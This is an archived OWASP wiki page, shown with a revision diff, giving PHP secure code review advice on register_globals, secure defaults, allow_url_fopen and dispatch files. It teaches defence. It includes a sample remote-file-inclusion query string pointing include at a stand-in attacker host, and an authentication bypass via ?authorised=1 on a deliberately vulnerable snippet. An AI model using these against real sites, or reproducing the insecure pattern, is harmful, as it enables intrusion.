This site is the archived OWASP Foundation Wiki and is no longer accepting Account Requests.
To view the new OWASP Foundation website, please visit https://owasp.org
Difference between revisions of "PHP Security Leading Practice"
(→Global Variables) |
|||
| Line 39: | Line 39: | ||
if this page was requested with register_globals enabled using the following parameter ?authorised=1 in the query string the athentication functionalotu assuems the used is authorised to proceed. | if this page was requested with register_globals enabled using the following parameter ?authorised=1 in the query string the athentication functionalotu assuems the used is authorised to proceed. | ||
Without register_globals enabled the variable $authorised would not be affected by the $authorised=1 parameter. | Without register_globals enabled the variable $authorised would not be affected by the $authorised=1 parameter. | ||
| + | |||
| + | === Initialization=== | ||
| + | When reviwewing PHP code make sure you can see the initialization value is in a "secure default" state. | ||
| + | For example $authorised = false; | ||
===Error handling=== | ===Error handling=== | ||
| Line 44: | Line 48: | ||
===File Manipulation=== | ===File Manipulation=== | ||
| + | |||
| + | '''allow_url_fopen''' enabled by default in PHP.ini This allows URL's to be treated like local files. | ||
| + | URL's with malicious scripting may be included and treated like a local file. | ||
| + | |||
| + | ===HTTP request Handling=== | ||
| + | The Dispatch method is used as a "funnel" wherein all requests are passed through it. One does not access other PHP files directly but rather via the dispatch.php. This could be akin to a global input validation class wherein all traffic passes. | ||
| + | |||
| + | http://www.example.com/dispatch.php?fid=dostuff | ||
| + | |||
| + | Relating to security it is leading practice to implement validation at the top of this file. | ||
| + | All other modules required can be '''include''' or '''require''' and in a different directory. | ||
| + | |||
| + | '''Including a method''': If a dispatch.php method is not being used look for includes at the top of each php file. | ||
| + | The '''include''' method may set a state such that the request can proceed. | ||
| + | |||
| + | It may be an idea to check out PHP.ini and look for the '''auto_prepend_file''' directive. This may reference an automatic include for all files. | ||
| + | |||
===Good Things to Use=== | ===Good Things to Use=== | ||
strip_tags(): | strip_tags(): | ||
Revision as of 10:47, 24 October 2007
Global Variables
One does not need to explicitly create "global variables" this is done via the php.ini file by setting the "register_globals" function on. register_globals has been disabled by default since PHP 4.1.0
Include directives in PHP can be vulnerable if register_globals is enabled.
<?PHP include "$dir/script/dostuff.php"; ?>
With register_globals enabled the $dir variable can be passed in via the query string:
?dir=http://www.haxor.com/gimmeeverything.php
This would result in the $dir being set to:
<?PHP include "http://www.haxor.com/gimmeeverything.php"; ?>
Appending global variables to the URL may be a way to circumvent authentication:
<?PHP
if(authenticated_user())
{
$authorised=true;
}
if($authorised)
{
give_family_jewels()
}
?>
if this page was requested with register_globals enabled using the following parameter ?authorised=1 in the query string the athentication functionalotu assuems the used is authorised to proceed. Without register_globals enabled the variable $authorised would not be affected by the $authorised=1 parameter.
Initialization
When reviwewing PHP code make sure you can see the initialization value is in a "secure default" state. For example $authorised = false;
Error handling
If possible check if one has turned off error reporting via php.ini and if "error_reporting" off.
File Manipulation
allow_url_fopen enabled by default in PHP.ini This allows URL's to be treated like local files. URL's with malicious scripting may be included and treated like a local file.
HTTP request Handling
The Dispatch method is used as a "funnel" wherein all requests are passed through it. One does not access other PHP files directly but rather via the dispatch.php. This could be akin to a global input validation class wherein all traffic passes.
http://www.example.com/dispatch.php?fid=dostuff
Relating to security it is leading practice to implement validation at the top of this file. All other modules required can be include or require and in a different directory.
Including a method: If a dispatch.php method is not being used look for includes at the top of each php file. The include method may set a state such that the request can proceed.
It may be an idea to check out PHP.ini and look for the auto_prepend_file directive. This may reference an automatic include for all files.
Good Things to Use
strip_tags(): Removes any HTML from a String nl2br(): Converts new line characters to HTML break "br" htmlspecialchars():
